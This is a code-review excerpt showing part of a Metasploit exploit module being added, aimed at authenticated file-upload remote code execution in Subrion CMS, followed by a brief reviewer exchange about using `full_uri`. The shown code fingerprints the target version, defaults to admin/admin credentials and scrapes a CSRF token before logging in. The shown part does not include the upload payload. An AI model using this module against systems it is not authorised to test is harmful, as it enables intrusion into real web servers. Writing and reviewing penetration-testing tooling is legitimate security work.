modules/exploits/linux/http/subrion_cms_file_upload_rce.rb

```diff
@@ -0,0 +1,213 @@
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2018-11-04',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80, true, 'Subrion CMS default port'),
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])
+      ]
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash
+    url_login = "http://#{datastore['RHOST']}:#{datastore['RPORT']}#{uri}"
+    print_status("Checking target web server for a response at: #{url_login}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && res.body.downcase.include?('subrion')
+      return CheckCode::Unknown('Target is not running Subrion CMS.')
+    end
+
+    print_good('Target is running Subrion CMS.')
+
+    print_status('Checking Subrion CMS version...')
+    version = res.body.match('Powered by <a href=.*')
+    version_number = version.to_s.split.last.scan(/\d+/).join('.') if version
+
+    unless version_number
+      return CheckCode::Detected('Subrion CMS version cannot be determined.')
+    end
+
+    print_good("Target is running Subrion CMS Version #{version_number}.")
+
+    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')
+      print_warning(
+        'This version check does not guarantee that the target is vulnerable, ' \
+        'since a fix for the vulnerability can easily be applied by a web admin.'
+      )
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login_and_get_csrf_token(username, password)
+    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')
+
+    # Session cookies need to be kept to preserve the CSRF token across multiple requests
+    uri = normalize_uri(target_uri.path, 'panel/')
+    url_login = "http://#{datastore['RHOST']}#{uri}"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'keep_cookies' => true
+    })
+
+    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">
+    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body
+    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?
+
+    print_good("Successfully obtained CSRF token: #{csrf_token}")
+
+    print_status(
+      "Logging in to Subrion Admin Panel at: #{url_login} " \
```

Comment:
Same here, I believe `full_uri` can be used instead.

Reply:
Also done.